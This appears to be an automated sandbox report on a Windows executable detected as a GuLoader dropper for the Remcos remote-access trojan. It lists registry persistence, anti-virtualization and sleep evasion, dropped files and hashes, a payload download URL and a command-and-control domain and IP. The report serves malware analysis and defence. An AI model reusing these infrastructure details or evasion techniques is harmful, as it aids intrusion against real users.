Source: C:\Users\user\Desktop\KO0q4biYfC.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\KO0q4biYfC.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\KO0q4biYfC.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\KO0q4biYfC.exe	Section loaded: winmm.dll	Jump to behavior

Source: C:\Users\user\Desktop\KO0q4biYfC.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: skovmandshilsnerne.lnk.0.dr

LNK file: ..\..\..\..\..\..\..\Windows\punktnedslagenes\Suspired157.Ege

Source: C:\Users\user\Desktop\KO0q4biYfC.exe

File written: C:\Users\user\AppData\Local\Temp\tmc.ini

Jump to behavior

Source: KO0q4biYfC.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000000.00000002.1350132255.000000000560C000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\KO0q4biYfC.exe

Code function: 0_2_73C61B5F LdrInitializeThunk,GlobalAlloc,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,lstrcpyW,GlobalFree,LdrInitializeThunk,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,LdrInitializeThunk,LdrInitializeThunk,GetModuleHandleW,LdrInitializeThunk,LoadLibraryW,GetProcAddress,lstrlenW,

0_2_73C61B5F

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Users\user\Desktop\KO0q4biYfC.exe

File created: C:\Users\user\AppData\Local\Temp\avaliable\Plderer180.scr

Jump to dropped file

Source: C:\Users\user\Desktop\KO0q4biYfC.exe	File created: C:\Users\user\AppData\Local\Temp\nsg3ACA.tmp\System.dll			Jump to dropped file
Source: C:\Users\user\Desktop\KO0q4biYfC.exe	File created: C:\Users\user\AppData\Local\Temp\avaliable\Plderer180.scr			Jump to dropped file

Boot Survival

Creates autostart registry keys with suspicious values (likely registry only malware)

Source: C:\Users\user\Desktop\KO0q4biYfC.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce hulske C:\Users\user\AppData\Local\Temp\avaliable\Plderer180.scr			Jump to behavior
Source: C:\Users\user\Desktop\KO0q4biYfC.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce hulske C:\Users\user\AppData\Local\Temp\avaliable\Plderer180.scr			Jump to behavior

Source: C:\Users\user\Desktop\KO0q4biYfC.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\myriam	Jump to behavior
Source: C:\Users\user\Desktop\KO0q4biYfC.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\myriam\Fonerne237	Jump to behavior
Source: C:\Users\user\Desktop\KO0q4biYfC.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\skovmandshilsnerne.lnk	Jump to behavior

Source: C:\Users\user\Desktop\KO0q4biYfC.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce hulske	Jump to behavior
Source: C:\Users\user\Desktop\KO0q4biYfC.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce hulske	Jump to behavior
Source: C:\Users\user\Desktop\KO0q4biYfC.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce hulske	Jump to behavior
Source: C:\Users\user\Desktop\KO0q4biYfC.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce hulske	Jump to behavior

Source: C:\Users\user\Desktop\KO0q4biYfC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KO0q4biYfC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KO0q4biYfC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KO0q4biYfC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KO0q4biYfC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KO0q4biYfC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KO0q4biYfC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KO0q4biYfC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\KO0q4biYfC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\KO0q4biYfC.exe	API/Special instruction interceptor: Address: 56CB3E3
Source: C:\Users\user\Desktop\KO0q4biYfC.exe	API/Special instruction interceptor: Address: 225B3E3

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\KO0q4biYfC.exe	RDTSC instruction interceptor: First address: 5687B37 second address: 5687B37 instructions: 0x00000000 rdtsc 0x00000002 cmp dx, ax 0x00000005 cmp ebx, ecx 0x00000007 jc 00007F760CDB1787h 0x00000009 inc ebp 0x0000000a inc ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\KO0q4biYfC.exe	RDTSC instruction interceptor: First address: 2217B37 second address: 2217B37 instructions: 0x00000000 rdtsc 0x00000002 cmp dx, ax 0x00000005 cmp ebx, ecx 0x00000007 jc 00007F760C5229D7h 0x00000009 inc ebp 0x0000000a inc ebx 0x0000000b rdtsc

Source: C:\Users\user\Desktop\KO0q4biYfC.exe	Window / User API: threadDelayed 1779			Jump to behavior
Source: C:\Users\user\Desktop\KO0q4biYfC.exe	Window / User API: threadDelayed 8213			Jump to behavior

Source: C:\Users\user\Desktop\KO0q4biYfC.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsg3ACA.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\KO0q4biYfC.exe TID: 2040	Thread sleep count: 1779 > 30	Jump to behavior
Source: C:\Users\user\Desktop\KO0q4biYfC.exe TID: 2040	Thread sleep time: -5337000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\KO0q4biYfC.exe TID: 2040	Thread sleep count: 8213 > 30	Jump to behavior
Source: C:\Users\user\Desktop\KO0q4biYfC.exe TID: 2040	Thread sleep time: -24639000s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\KO0q4biYfC.exe	Code function: 0_2_0040672B FindFirstFileW,FindClose,	0_2_0040672B
Source: C:\Users\user\Desktop\KO0q4biYfC.exe	Code function: 0_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,	0_2_00405AFA
Source: C:\Users\user\Desktop\KO0q4biYfC.exe	Code function: 0_2_00402868 FindFirstFileW,	0_2_00402868
Source: C:\Users\user\Desktop\KO0q4biYfC.exe	Code function: 8_2_00402868 FindFirstFileW,	8_2_00402868
Source: C:\Users\user\Desktop\KO0q4biYfC.exe	Code function: 8_2_0040672B FindFirstFileW,FindClose,	8_2_0040672B
Source: C:\Users\user\Desktop\KO0q4biYfC.exe	Code function: 8_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,	8_2_00405AFA

Source: KO0q4biYfC.exe, 00000008.00000002.3700510046.0000000006AE8000.00000004.00000020.00020000.00000000.sdmp, KO0q4biYfC.exe, 00000008.00000002.3700510046.0000000006B40000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\KO0q4biYfC.exe	API call chain: ExitProcess graph end node			graph_0-4541
Source: C:\Users\user\Desktop\KO0q4biYfC.exe	API call chain: ExitProcess graph end node			graph_0-4696

Source: C:\Users\user\Desktop\KO0q4biYfC.exe

Code function: 0_2_00406943 GlobalFree,LdrInitializeThunk,GlobalAlloc,GlobalFree,LdrInitializeThunk,GlobalAlloc,

0_2_00406943

Source: C:\Users\user\Desktop\KO0q4biYfC.exe

0_2_73C61B5F

Source: C:\Users\user\Desktop\KO0q4biYfC.exe

Process created: C:\Users\user\Desktop\KO0q4biYfC.exe "C:\Users\user\Desktop\KO0q4biYfC.exe"

Jump to behavior

Source: C:\Users\user\Desktop\KO0q4biYfC.exe

Code function: 0_2_004034A5 EntryPoint,LdrInitializeThunk,SetErrorMode,GetVersion,lstrlenA,LdrInitializeThunk,#17,OleInitialize,LdrInitializeThunk,SHGetFileInfoW,GetCommandLineW,CharNextW,LdrInitializeThunk,GetTempPathW,LdrInitializeThunk,GetTempPathW,GetWindowsDirectoryW,lstrcatW,LdrInitializeThunk,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,

0_2_004034A5

Stealing of Sensitive Information

Yara detected Remcos RAT

Source: Yara match	File source: 00000008.00000002.3700510046.0000000006B28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3700597027.0000000006B54000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: KO0q4biYfC.exe PID: 6596, type: MEMORYSTR

Remote Access Functionality

Detected Remcos RAT

Source: C:\Users\user\Desktop\KO0q4biYfC.exe

Mutex created: \Sessions\1\BaseNamedObjects\Rmc-B0AIE8

Jump to behavior

Yara detected Remcos RAT

Source: Yara match	File source: 00000008.00000002.3700510046.0000000006B28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3700597027.0000000006B54000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: KO0q4biYfC.exe PID: 6596, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	111 Registry Run Keys / Startup Folder	1 Access Token Manipulation	11 Masquerading	OS Credential Dumping	31 Security Software Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	11 Process Injection	1 Virtualization/Sandbox Evasion	LSASS Memory	1 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Clipboard Data	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	111 Registry Run Keys / Startup Folder	1 Access Token Manipulation	Security Account Manager	1 Application Window Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Remote Access Software	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 DLL Side-Loading	11 Process Injection	NTDS	3 File and Directory Discovery	Distributed Component Object Model	Input Capture	1 Ingress Tool Transfer	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	23 System Information Discovery	SSH	Keylogging	2 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Obfuscated Files or Information	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	113 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
KO0q4biYfC.exe	42%	ReversingLabs	Win32.Trojan.Generic
KO0q4biYfC.exe	53%	Virustotal		Browse
KO0q4biYfC.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\avaliable\Plderer180.scr	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\avaliable\Plderer180.scr	42%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\nsg3ACA.tmp\System.dll	0%	ReversingLabs

Source	Detection	Scanner	Label
newkezfill.site	0%	Avira URL Cloud	safe
https://www.healthselflesssupplies.co.za/PLBVeySxbfKXMM176.bin	0%	Avira URL Cloud	safe
https://www.healthselflesssupplies.co.za/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
newkezfill.site	87.120.84.23	true	true	unknown
healthselflesssupplies.co.za	164.160.91.32	true	false	unknown
www.healthselflesssupplies.co.za	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
newkezfill.site	true	Avira URL Cloud: safe	unknown
https://www.healthselflesssupplies.co.za/PLBVeySxbfKXMM176.bin	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nsis.sf.net/NSIS_ErrorError	KO0q4biYfC.exe, Plderer180.scr.8.dr	false		high
https://www.healthselflesssupplies.co.za/	KO0q4biYfC.exe, 00000008.00000002.3700510046.0000000006B28000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
164.160.91.32	healthselflesssupplies.co.za	South Africa		328037	ElitehostZA	false
87.120.84.23	newkezfill.site	Bulgaria		51189	SHARCOM-ASBG	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1585953
Start date and time:	2025-01-08 15:07:08 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 17s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	16
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	KO0q4biYfC.exe renamed because original name is a hash value
Original Sample Name:	03fe92bf84effb45dfb4c47da5704f0b35c3ca3b562ac2f46c1da51a8829eb5e.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@3/11@2/2
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 91% Number of executed functions: 56 Number of non-executed functions: 71
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.245.163.56, 4.175.87.197
Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target KO0q4biYfC.exe, PID 6596 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
10:51:09	API Interceptor	4016311x Sleep call for process: KO0q4biYfC.exe modified
16:50:25	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce hulske C:\Users\user\AppData\Local\Temp\avaliable\Plderer180.scr
16:50:33	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce hulske C:\Users\user\AppData\Local\Temp\avaliable\Plderer180.scr

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
164.160.91.32	Quote Qu11262024.scr.exe	Get hash	malicious	Remcos, GuLoader	Browse
	Purchase-Order27112024.scr.exe	Get hash	malicious	Remcos, GuLoader	Browse
	https://arcalo.ru.com/#cathy.sekula@steptoe-johnson.com	Get hash	malicious	HTMLPhisher	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ElitehostZA	Quote Qu11262024.scr.exe	Get hash	malicious	Remcos, GuLoader	Browse	164.160.91.32
	Purchase-Order27112024.scr.exe	Get hash	malicious	Remcos, GuLoader	Browse	164.160.91.32
	https://arcalo.ru.com/#cathy.sekula@steptoe-johnson.com	Get hash	malicious	HTMLPhisher	Browse	164.160.91.32
	https://url.us.m.mimecastprotect.com/s/E9vACKrzxZSDM5kTOI6-C?domain=urldefense.proofpoint.com	Get hash	malicious	Unknown	Browse	164.160.91.37
	https://filmsinvest.com/material/?interprete=UTJGeWJXVnNidz09LFltVnlaMlYyYVdkcFlTNWpiMjA9LFkyRnliV1ZzYnk1allXNWhiR1Z6	Get hash	malicious	Unknown	Browse	164.160.91.31
	https://filmsinvest.com/material/?statement=UkdGMmFXUT0sZW1sd2NHOHVZMjl0LFpHZGhiR3hwYTJWeQ==	Get hash	malicious	Unknown	Browse	164.160.91.31
	http://www.fire.co.za	Get hash	malicious	Unknown	Browse	164.160.91.17
	https://bsigroup.apor.co.za/sgfkze/ZGF2aWQubXVnZW55aUBic2lncm91cC5jb20=	Get hash	malicious	Unknown	Browse	164.160.91.23
	https://ums.koreanair.com/Check.html?redirectUrl=TV9JRD01MTMy&U1RZUEU9TUFTUw==&TElTVF9UQUJMRT1FTVNfTUFTU19TRU5EX0xJU1Q=&UE9TVF9JRD0yMDE5MDkyMzAwMDAy&VEM9MjAxOTEwMjM=&S0lORD1D&Q0lEPTAwMg==&URL=https://harriswilliams.apor.co.za/6fh8je/Ymx1Y2FzQGhhcnJpc3dpbGxpYW1zLmNvbQ==	Get hash	malicious	HTMLPhisher	Browse	164.160.91.23
	Q_u_a_r_a_nt_i_n_e A_l_e_r_t giovanni.busco RD6KUA46 648950657.eml	Get hash	malicious	HTMLPhisher	Browse	164.160.91.37
SHARCOM-ASBG	casseyofficefile.dot.rtf	Get hash	malicious	Unknown	Browse	87.120.84.39
	Inquiries-Quote Products.docx.doc	Get hash	malicious	Unknown	Browse	87.120.84.39
	Inquiries-Quote Products.docx.doc	Get hash	malicious	Unknown	Browse	87.120.84.39
	xXdquUOrM1vD3An.doc	Get hash	malicious	Unknown	Browse	87.120.84.39
	7ar1l60013Sx8PT.doc	Get hash	malicious	Unknown	Browse	87.120.84.39
	d1wn7m0x0FWFbfs.doc	Get hash	malicious	Unknown	Browse	87.120.84.39
	xi4HNTgb7wewrDQ.doc	Get hash	malicious	Unknown	Browse	87.120.84.39
	zxdonmn.doc	Get hash	malicious	Unknown	Browse	87.120.84.39
	NEW ORDER #233.xlam.xlsx	Get hash	malicious	Unknown	Browse	87.120.84.39
	Bank Copy.docx.doc	Get hash	malicious	Unknown	Browse	87.120.84.39

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe	Get hash	malicious	Remcos, GuLoader	Browse	164.160.91.32
	e2664726330-76546233.05.exe	Get hash	malicious	Nitol	Browse	164.160.91.32
	e2664726330-76546233.05.exe	Get hash	malicious	Unknown	Browse	164.160.91.32
	chu4rWexSX.exe	Get hash	malicious	LummaC	Browse	164.160.91.32
	xHj1N8ylIf.exe	Get hash	malicious	LummaC	Browse	164.160.91.32
	leBwnyHIgx.exe	Get hash	malicious	GhostRat	Browse	164.160.91.32
	c2.hta	Get hash	malicious	Remcos	Browse	164.160.91.32
	c2.hta	Get hash	malicious	Remcos	Browse	164.160.91.32
	setup.msi	Get hash	malicious	Unknown	Browse	164.160.91.32

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\nsg3ACA.tmp\System.dll	Yoranis Setup.exe	Get hash	malicious	Unknown	Browse
	Yoranis Setup.exe	Get hash	malicious	Unknown	Browse
	Pralevia Setup 1.0.0.exe	Get hash	malicious	Unknown	Browse
	Pralevia Setup 1.0.0.exe	Get hash	malicious	Unknown	Browse
	NativeApp_G5L1NHZZ.exe	Get hash	malicious	LummaC Stealer	Browse
	Awb 4586109146.bat.exe	Get hash	malicious	AgentTesla, GuLoader	Browse
	PO 0309494059506060609696007.exe	Get hash	malicious	AgentTesla, GuLoader	Browse
	YF3YnL4ksc.exe	Get hash	malicious	Unknown	Browse
	YF3YnL4ksc.exe	Get hash	malicious	Unknown	Browse
	CapCut_12.0.4_Installer.exe	Get hash	malicious	LummaC Stealer	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\BaConf.ini

Download File

Process:	C:\Users\user\Desktop\KO0q4biYfC.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	48
Entropy (8bit):	4.829448698502606
Encrypted:	false
SSDEEP:	3:15KlW9HAQLQIfLBJXlFGfv:1IlW9gQkIPeH
MD5:	E7F60749537446D1C77072173B5415A3
SHA1:	B9CFEF43585C8B26A5DAA2FE581859759A183C67
SHA-256:	3E1FC0E4A2EA442BF9F3DD4AE9444F8C595B9E7701DE2FD7ABCF7F7B29D9C683
SHA-512:	D125EDEA7D087009C00747B7C695A21F99B330DD5058FB0A2E3CD68EAFCACA63CAD591722DA6355A0FBC60D2E9710877BFAC713ECEEA64E7D9E6133599AFE884
Malicious:	false
Reputation:	low
Preview:	[ExReBoot]..Acc=user32::EnumWindows(i r2 ,i 0)..

C:\Users\user\AppData\Local\Temp\avaliable\Plderer180.scr

Download File

Process:	C:\Users\user\Desktop\KO0q4biYfC.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	518146
Entropy (8bit):	7.955449898327909
Encrypted:	false
SSDEEP:	12288:B7MTFoKqS6k0jRWhI/L366W5Fd3IYXCNoSZFDHBa7Pqh:B7MTFoZS6kURFL66seoS3Dha7ih
MD5:	DD935B0E91E2E551B21296D8FA186D11
SHA1:	9638372C80F866BDC1B73AF7971918E8BA7AB9E7
SHA-256:	03FE92BF84EFFB45DFB4C47DA5704F0B35C3CA3B562AC2F46C1DA51A8829EB5E
SHA-512:	FDF1FFBEB25F7E0B691C6F0127C297C804D1ECC71579FEF69E7D27429902988EE84B34CE2826C49B213F96B1A47D32868DDBCD23D4954D5D80535373FB40D109
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 42%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf._9..Pf..Pg.LPf._;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L...$..\.................f...*.......4............@..........................`............@.......................................... ..`1...........................................................................................................text....d.......f.................. ..`.rdata...............j..............@..@.data...X............~..............@....ndata...p...............................rsrc...`1... ...2..................@..@................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsg3ACA.tmp\System.dll

Download File

Process:	C:\Users\user\Desktop\KO0q4biYfC.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	5.719859767584478
Encrypted:	false
SSDEEP:	192:1enY0LWelt70elWjvfstJcVtwtYbjnIOg5AaDnbC7ypXhtIj:18PJlt70esj0Mt9vn6ay6
MD5:	0D7AD4F45DC6F5AA87F606D0331C6901
SHA1:	48DF0911F0484CBE2A8CDD5362140B63C41EE457
SHA-256:	3EB38AE99653A7DBC724132EE240F6E5C4AF4BFE7C01D31D23FAF373F9F2EACA
SHA-512:	C07DE7308CB54205E8BD703001A7FE4FD7796C9AC1B4BB330C77C872BF712B093645F40B80CE7127531FE6746A5B66E18EA073AB6A644934ABED9BB64126FEA9
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: Yoranis Setup.exe, Detection: malicious, Browse Filename: Yoranis Setup.exe, Detection: malicious, Browse Filename: Pralevia Setup 1.0.0.exe, Detection: malicious, Browse Filename: Pralevia Setup 1.0.0.exe, Detection: malicious, Browse Filename: NativeApp_G5L1NHZZ.exe, Detection: malicious, Browse Filename: Awb 4586109146.bat.exe, Detection: malicious, Browse Filename: PO 0309494059506060609696007.exe, Detection: malicious, Browse Filename: YF3YnL4ksc.exe, Detection: malicious, Browse Filename: YF3YnL4ksc.exe, Detection: malicious, Browse Filename: CapCut_12.0.4_Installer.exe, Detection: malicious, Browse
Reputation:	high, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L....~.\...........!....."...........).......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.....................@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsv39A0.tmp

Download File

Process:	C:\Users\user\Desktop\KO0q4biYfC.exe
File Type:	data
Category:	dropped
Size (bytes):	1330866
Entropy (8bit):	3.558848742520734
Encrypted:	false
SSDEEP:	12288:32D0KF877z7ZNcDeNsFeIkWi3pjcdCByKSq:mY77z1yUs39it6CB2q
MD5:	54C04146ACF828660D7C4DF9359353B5
SHA1:	1E5A11DF9AF39210301D92065A163EE866BF4E20
SHA-256:	3CB43D0A8EF5152CF8EC26F416E6374765D782D7CEB3D89D25A51BF0A4016EBC
SHA-512:	78EE69C1B24995C8A0369776F6CD5E83886D19FDC43CF8D6F1665876998A1CEEBD87FB04F3B7EA6F4CAF4DE1C7CCC0CD0B43C4D8658E3C20C48B3ADEE67BBB8C
Malicious:	false
Reputation:	low
Preview:	.#......,...................l............"......r#..........................................................t.x.............................................................................................................................................................................G...R...........}...j...........................................................................................................................................@...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmc.ini

Download File

Process:	C:\Users\user\Desktop\KO0q4biYfC.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	27
Entropy (8bit):	4.134336113194451
Encrypted:	false
SSDEEP:	3:iGAeSMn:lAeZ
MD5:	7AB6006A78C23C5DEC74C202B85A51A4
SHA1:	C0FF9305378BE5EC16A18127C171BB9F04D5C640
SHA-256:	BDDCBC9F6E35E10FA203E176D28CDB86BA3ADD97F2CFFD2BDA7A335B1037B71D
SHA-512:	40464F667E1CDF9D627642BE51B762245FA62097F09D3739BF94728BC9337E8A296CE4AC18380B1AED405ADB72435A2CD915E3BC37F6840F34781028F3D8AED6
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	[Access]..Setting=Enabled..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\skovmandshilsnerne.lnk

Download File

Process:	C:\Users\user\Desktop\KO0q4biYfC.exe
File Type:	MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
Category:	dropped
Size (bytes):	858
Entropy (8bit):	3.3886083215736877
Encrypted:	false
SSDEEP:	12:8wl0o0m/3BV6XDPK827Mex9sl9fW+wR27Mvsl9fkXg1MJ5lL6CNbw4t2YZ/elFlz:8kJ/B8Krm9e+wk9fow2bIqy
MD5:	C7CBB76C0820BE9D0E42F9CCF5F1BE20
SHA1:	535C6D458330B55596280B3D9B7AFCA743198139
SHA-256:	AE235EFAC63977B67340A7BD1E8916059A0C301525A72E8F637456272EF7EB59
SHA-512:	3F86477FC11ED9578174809547899031489E8D09E16C888D519D6895D5B19EF96A2EF8B0BD75D15418FE30392767862F106834B4D72ECCF7FD03621C586D28EA
